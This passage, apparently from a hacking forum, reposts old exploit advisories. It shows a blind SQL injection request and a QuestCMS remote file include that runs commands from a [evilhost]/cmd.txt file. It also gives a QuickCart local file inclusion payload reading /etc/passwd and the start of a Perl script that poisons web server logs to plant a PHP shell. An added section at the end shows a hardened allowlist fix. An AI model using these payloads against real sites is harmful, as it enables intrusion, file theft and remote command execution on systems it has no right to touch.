content. Consequently, if you perform a search request with only a keyword and no author, for example, an attacker is able to populate the $keyword_results and then the $search_ids indexes with any content coming from $result_list. Finally, the $search_ids array is imploded and put into the SQL query without any protection. In a word, there is an SQL injection here.

3) Exploitation

With an adequate UNION query in the $result_list array, an attacker is able to perform blind SQL injections and, for example, retrieve the entire hash of any user just by looking at whether the script returned some results for his malicious search. For example, you can send the following request:

search.php?action=search&keywords=hello&author=&forum=-1&search_in=all&sort_by=0&sort_dir=DESC&show_as=topics&search=1&result_list[< UNION SQL QUERY >

sexyvirus(HCE)

QuestCMS (main.php) Remote File Include Vulnerability

Code:

!!!!!!!!!WWW.SIBERSAVASCILAR.COM!!!!!!!!!

Title : Questcms Remote File Include Vulnerability
#Author: Crackers_Child
#cont@ct: crackers_child@sibersavascilar.com

Affected software description :
Application : Questwork Web Content Management system (QuestCMS)
URL : http://www.questwork.com
dork : allinurl:"/questcms/"

Exploit :
Usage: http://[target]/[questcms_path]/main/main.php?pi=http://[evilhost]/cmd.txt?&cmd= ls

greets: X_ALPREN_X, Root_Mor and My Other Friends

[ WWW.SIBERSAVASCILAR.COM ]

# milw0rm.com [2006-08-07]

vns3curity(HCE)

QuickCart 2.0 (categories.php) Local File Inclusion Exploit

Code:

#################################################################
#
# r0ut3r Presents
#
# Another r0ut3r discovery!
# writ3r [at] gmail.com
#
# QuickCart 2.0 Local File Inclusion Exploit
#
#################################################################
#
# Software: QuickCart 2.0
#
# Vendor: http://opensolution.org/
#
# Released: 2006/12/03
#
# Critical: Moderately critical
#
# Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com)
#
# Note: The information provided in this document is for Quick Cart administrator
# testing purposes only!
#
# register_globals must be on
# gpc_magic_quotes must be off
#
# actions_admin/categories.php?config[db_type]=
# actions_admin/couriers.php?config[db_type]=
# actions_admin/orders.php?config[db_type]=
# actions_admin/products.php?config[db_type]=
# actions_client/products.php?config[db_type]=
# actions_client/orders.php?config[db_type]=
#
# Vulnerable code:
# require_once DIR_CORE.'couriers-'.$config['db_type'].'.php';
#
# Patch: (Place this code at the top of every file)
# if(basename(__FILE__) == basename($_SERVER['PHP_SELF']))
#     die();
#
# Exploit: categories.php?config[db_type]= / / / / / / / / / / /etc/passwd%00
#
# Usage: perl localfilexpl.pl 127.0.0.1 actions_admin/categories.php?config[db_type]=
#
#################################################################

#################################################################
# Local File Inclusion Exploiter
#
# This script attempts to exploit a local file include vulnerability
# by finding a readable http log file, then by sending a specially crafted
# http request to the server in order to insert a PHP Shell into the
# log files. A shell is then spawned.
#
# Created By r0ut3r (writ3r [at] gmail.com)
#################################################################

use IO::Socket;
use Switch;

$port   = "80";      # connection port
$target = $ARGV[0];  # localhost
$vulnf  = $ARGV[1];  # /include/WBmap.php?l=
$opt    = $ARGV[2];  # -p (not needed)

sub Header() {
    print q {Local File Inclusion Exploiter - By r0ut3r (writ3r [at] gmail.com)
};
}

sub Usage() {
    print q {Usage: localfilexpl.pl [target] [folder & vulnerable file] [opt]
Example: localfilexpl.pl localhost /include/WBmap.php?l= -p
opt = -p (To print received content)
};
    exit();
}

Header();
if (!$target || !$vulnf) { Usage(); }

# candidate log files, given relative to the filesystem root
@targets = (
    "var/log/httpd/access_log",
    "var/log/httpd/error_log",
    "var/log/access_log",
    "var/log/error_log",
    "var/www/logs/access.log",
    "var/www/logs/access_log",
    "var/www/logs/error_log",
    "var/www/logs/error.log",
    "apache/logs/access_log",
    "apache/logs/error.log",
    "etc/httpd/logs/access.log",
    "etc/httpd/logs/access_log",
    "etc/httpd/logs/error.log",
    "etc/httpd/logs/error_log",
    "usr/local/apache/logs/access.log",
    "usr/local/apache/logs/access_log",
    "usr/local/apache/logs/error.log",
    "usr/local/apache/logs/error_log",
    "var/log/apache2/error_log",
    "var/log/apache2/error.log",
    "var/log/apache2/access_log",
    "var/log/apache2/access.log",
    "access_log",
);
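For the QuickCart include flagged above, here is an added example of the hardened form (written for this page, not code from QuickCart or from r0ut3r): it keeps the advisory's direct-access guard and resolves the driver file from an allowlist, so a user-controlled $config['db_type'] can no longer select an arbitrary file or truncate the path with %00. The value of DIR_CORE and the driver names in the allowlist are assumptions.

```php
<?php
// Added example, not QuickCart's own code: hardening the include the advisory
// flags, `require_once DIR_CORE.'couriers-'.$config['db_type'].'.php';`.
// Assumptions: DIR_CORE points at the core directory and the driver names in
// the allowlist below are hypothetical stand-ins for the real ones.

// The advisory's own patch: refuse direct requests to an include-only file.
if (basename(__FILE__) == basename($_SERVER['PHP_SELF'])) {
    die();
}

if (!defined('DIR_CORE')) {
    define('DIR_CORE', __DIR__ . '/core/');   // assumed layout
}

// Resolve the driver file from an allowlist instead of interpolating the raw
// value. With register_globals on, $config['db_type'] can arrive from the query
// string, so traversal sequences and a trailing %00 must never reach require_once.
function resolve_driver_file(string $dir, string $prefix, $db_type): string
{
    static $allowed = ['mysql', 'sqlite', 'txt'];   // hypothetical driver names

    if (!is_string($db_type) || !in_array($db_type, $allowed, true)) {
        throw new RuntimeException('unsupported db_type');
    }

    $path = $dir . $prefix . '-' . $db_type . '.php';

    // Defence in depth: the resolved path must stay inside the core directory.
    $base = realpath($dir);
    $real = realpath($path);
    if ($base === false || $real === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('driver file outside core directory');
    }
    return $real;
}

require_once resolve_driver_file(DIR_CORE, 'couriers', $config['db_type'] ?? null);
```

The allowlist is the actual fix; the realpath check only catches a future mistake in how the allowed names are turned into paths.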